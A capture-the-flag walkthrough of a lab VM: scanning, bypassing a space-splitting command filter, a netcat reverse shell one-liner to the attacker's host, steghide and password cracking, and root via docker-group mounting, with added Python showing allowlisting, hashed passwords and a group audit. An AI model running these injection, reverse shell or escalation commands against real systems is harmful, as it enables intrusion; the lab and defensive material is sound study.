Target machine description: the hint is "enumeration".
1. Find the target's IP: 192.168.74.135
nmap -sn 192.168.74.0/24
2. Scan the target's ports
root@kali:~# nmap -A -p- 192.168.74.135
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.74.135
Host is up (0.0044s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 04:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.74.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
MAC Address: 00:0C:29:60:7D:E9 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/21%OT=21%CT=1%CU=32901%PV=Y%DS=1%DC=D%G=Y%M=000C29%
OS:TM=5FE03DF0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=
OS:I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%
OS:O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W
OS:6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 4.42 ms 192.168.74.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.44 seconds
root@kali:~#
3. Visit the FTP service first. There is a note.txt file; its contents hint that commands are being filtered, so command injection is probably needed somewhere later.
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
4. Visit port 80. The home page is a flashy static page with nothing useful. Directory brute-forcing finds a secret directory.
Opening it reveals a page that executes commands. Entering ifconfig first returns output successfully.
Entering cat, ls, bash, php and the like just displays "hack" (this has that CTF feel).
Here I use tac to bypass it and look at which commands it filters:
tac index.php
The core code is as follows:
Its check merely splits the input command on spaces and matches the tokens one by one, which is fairly easy to bypass (ps: the ls here can also be bypassed just by inserting '' in the middle).
Using a semicolon to run multiple commands ('|', '&', '||', '&&' and so on all work) bypasses the check; this gives a reverse shell, which is then upgraded to a tty with python3.
ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.74.129 1234 >/tmp/f
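Added example, not code from the target or from the original post: a Python model of the two designs. weak_filter reproduces the mechanism the walkthrough describes (split the raw string on spaces, refuse it only if a whole token is on a deny list), and hardened_dispatch is the allowlist design a maintainer should use instead, mapping a menu choice to a fixed argv and never handing user text to a shell. The deny list and the two allowlisted commands are assumptions for the example.

```python
import subprocess

# Constructed deny list modelled on the behaviour observed on the target page:
# these tokens returned "hack" when typed into the command form.
DENY_LIST = {"cat", "ls", "bash", "php"}


def weak_filter(cmd: str) -> bool:
    """Token deny list as described in the walkthrough.

    Splits the raw command on spaces and refuses it only if a whole token is in
    DENY_LIST. Returns True when the command would be allowed through. Because
    it never considers shell metacharacters, quoting or alternative commands,
    it is not a security boundary.
    """
    return not any(tok in DENY_LIST for tok in cmd.split(" "))


# Allowlist (assumed): the only operations the page legitimately needs, each
# bound to a fixed argv. Nothing the user types is ever interpreted by a shell.
ALLOWED_COMMANDS = {
    "ifconfig": ["ifconfig"],
    "uptime": ["uptime"],
}


def hardened_dispatch(choice: str):
    """Return the fixed argv for an allowlisted choice, or None if it is not allowed."""
    return ALLOWED_COMMANDS.get(choice.strip())


def run_allowlisted(choice: str) -> str:
    """Execute an allowlisted choice without a shell and return its stdout."""
    argv = hardened_dispatch(choice)
    if argv is None:
        return "command not permitted"
    result = subprocess.run(argv, capture_output=True, text=True,
                            check=False, shell=False)
    return result.stdout


if __name__ == "__main__":
    for sample in ["ifconfig", "cat index.php", "tac index.php", "uptime; id"]:
        print(f"{sample!r}: weak filter allows={weak_filter(sample)}, "
              f"allowlist argv={hardened_dispatch(sample)}")
```

The deny list only stops the four literal tokens; any other command name or any input with extra shell syntax sails through, which is exactly what the walkthrough exploits. The allowlist rejects everything that is not one of the two fixed choices, and because the argv is built by the server rather than parsed from the request, there is no string for a shell to reinterpret.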
5. After some searching, there is a files folder under /var/www; inside it is a hacker.php. View its contents:
<html>
<head>
<body>
<style>
body {
background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
}
h2
{
color:red;
font-weight: bold;
}
h1
{
color: yellow;
font-weight: bold;
}
</style>
<center>
<img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
<h1 style="background-color:red;">You have reached this far. </h2>
<h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
</center>
</head>
</html>
6. Given the hint in its text, "look in the dark", plus the fancy image name, steganography is likely involved (very CTF). Start a simple web server with python3 in the images directory and download the image locally.
Target: python3 -m http.server &
Local:
wget http://192.168.74.135:8000/hacker-with-laptop_23-2147985341.jpg //download the image
steghide info hacker-with-laptop_23-2147985341.jpg //analyse the hidden data in the image
steghide extract -sf hacker-with-laptop_23-2147985341.jpg //extract the archive hidden in the image
A password is required to unzip the archive.
Following the hint at the very start, enumeration, start brute-forcing directly.
The brute-force succeeds; the password is pass1word.
After extracting the archive, view the file contents:
<html>
<head>
Admin Portal
</head>
<title> Site Under Development ... </title>
<body>
<form method="POST">
Username: <input type="text" name="name" placeholder="username"><br><br>
Email: <input type="email" name="email" placeholder="email"><br><br>
Password: <input type="password" name="password" placeholder="password">
<input type="submit" name="submit" value="Submit">
</form>
<?php
if(isset($_POST['submit']))
{
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
{
$random = rand(1000,9999);?><br><br><br>
<form method="POST">
Enter the OTP: <input type="number" name="otp">
<input type="submit" name="submitOtp" value="Submit">
</form>
<?php mail($email,"OTP for authentication",$random);
if(isset($_POST["submitOtp"]))
{
$otp = $_POST["otp"];
if($otp == $random)
{
echo "Welcome Anurodh!";
header("Location: authenticated.php");
}
else
{
echo "Invalid OTP";
}
}
}
else
{
echo "Invalid Username or Password";
}
}
?>
</html>
There is a base64 string in the middle; decoding it gives !d0ntKn0wmYp@ssw0rd
It looks like a password. To see which users exist, list the folders under the home directory: there are three. Combined with the code in the file above, the guess is anurodh.
7. SSH into the target with this username and password; the login succeeds. sudo -l shows that a script file can be executed as apaar.
apaar's home directory can be entered directly; it contains a local.txt file that is not readable, but the script file mentioned above is readable.
The msg part of it allows command execution, so run it as apaar to read local.txt and obtain the first flag.
8. The id command shows anurodh belongs to the docker group, which is all too familiar. docker images shows a local image exists, good.
Then the painfully familiar docker privilege-escalation command yields the final flag.
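Added example, not code from the target or from the original post: the admin portal above compares base64_encode($password) against a literal, so anyone who reads the source recovers the password (base64 is reversible encoding, not a hash), and it regenerates rand(1000,9999) on every request without storing it, so the OTP check can never match a code that was mailed earlier. The Python below shows the decode the walkthrough performs next to what the portal should have done: a salted PBKDF2 record checked in constant time, and an OTP issued once, kept server-side and consumed on first use. The password record and session class are assumptions for the example; only the base64 literal comes from the page.

```python
import base64
import hashlib
import hmac
import os
import secrets

# Literal copied from the admin portal source above.
PORTAL_B64 = "IWQwbnRLbjB3bVlwQHNzdzByZA=="


def recover_from_base64(encoded: str) -> str:
    """base64 is an encoding, not a hash: holding the source yields the password."""
    return base64.b64decode(encoded).decode()


def make_password_record(password: str, iterations: int = 200_000) -> dict:
    """Salted PBKDF2-HMAC-SHA256 record; store this instead of an encoded password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(record: dict, candidate: str) -> bool:
    """Recompute the digest and compare in constant time (no loose == and no timing leak)."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["digest"])


class OtpSession:
    """Server-side OTP state (assumed design, not the portal's).

    The portal drew a new random value on every request and never stored it,
    so the submitted OTP was compared against a fresh number. Here the code is
    generated once with a CSPRNG, kept server-side, limited to a few attempts,
    and consumed as soon as it is accepted or the attempts run out.
    """

    def __init__(self, digits: int = 6, max_attempts: int = 3):
        self._otp = None
        self._digits = digits
        self._attempts_left = max_attempts

    def issue(self) -> str:
        """Generate and remember a zero-padded code; the caller delivers it out of band."""
        self._otp = f"{secrets.randbelow(10 ** self._digits):0{self._digits}d}"
        return self._otp

    def check(self, submitted: str) -> bool:
        """Return True once for the correct code; lock out when attempts are exhausted."""
        if self._otp is None or self._attempts_left <= 0:
            return False
        self._attempts_left -= 1
        ok = hmac.compare_digest(self._otp, str(submitted))
        if ok or self._attempts_left == 0:
            self._otp = None
        return ok


if __name__ == "__main__":
    print("portal password:", recover_from_base64(PORTAL_B64))
    record = make_password_record("example-password")  # constructed value
    print("verify correct:", verify_password(record, "example-password"))
    session = OtpSession()
    code = session.issue()
    print("otp accepted once:", session.check(code), "again:", session.check(code))
```

Two details matter in practice: the comparison functions take the stored secret from the server side and never echo it back, and the OTP session object is what a real deployment would bind to the user's server session so that the value mailed to the user is the one later checked.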
docker run -v /:/mnt -it alpine
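Added example, not part of the walkthrough: an audit helper for the kind of group membership the final step relies on. A member of the docker group can start a container with host paths mounted, as the command above does, so that membership is effectively root and should be reviewed like sudo. The group list and the sample /etc/group content are constructed for the example.

```python
# Groups whose membership is effectively root on a typical Linux host
# (assumed list; extend it for the distribution being audited).
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can run containers with host paths mounted (full host filesystem access)",
    "lxd": "can launch privileged containers",
    "disk": "raw read/write access to block devices",
    "sudo": "may run commands as root (review /etc/sudoers as well)",
    "wheel": "may run commands as root (review /etc/sudoers as well)",
}

# Constructed /etc/group content so the example runs offline; audit_host()
# reads the real file.
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:apaar
docker:x:999:anurodh
users:x:100:apaar,anurodh
"""


def parse_group_file(text: str) -> dict:
    """Return {group_name: [members]} from /etc/group-style text.

    Only the fourth field (supplementary members) is considered; a user's
    primary group is recorded in /etc/passwd and is not covered here.
    """
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue  # malformed line: skip rather than guess
        name, _password, _gid, members = fields[:4]
        groups[name] = [m for m in members.split(",") if m]
    return groups


def find_root_equivalent_members(text: str) -> list:
    """Return sorted (user, group, reason) tuples for every root-equivalent membership."""
    findings = []
    for group, members in parse_group_file(text).items():
        reason = ROOT_EQUIVALENT_GROUPS.get(group)
        if reason is None:
            continue
        for user in members:
            findings.append((user, group, reason))
    return sorted(findings)


def audit_host(path: str = "/etc/group") -> list:
    """Run the check against a real group file."""
    with open(path, encoding="utf-8") as fh:
        return find_root_equivalent_members(fh.read())


if __name__ == "__main__":
    for user, group, reason in find_root_equivalent_members(SAMPLE_GROUP_FILE):
        print(f"{user}: member of {group}: {reason}")
```

On the sample data the check flags anurodh through docker and apaar through sudo while ignoring the ordinary users group; on a real host, run audit_host() and treat every docker finding as a root account that needs the same justification a sudoers entry would.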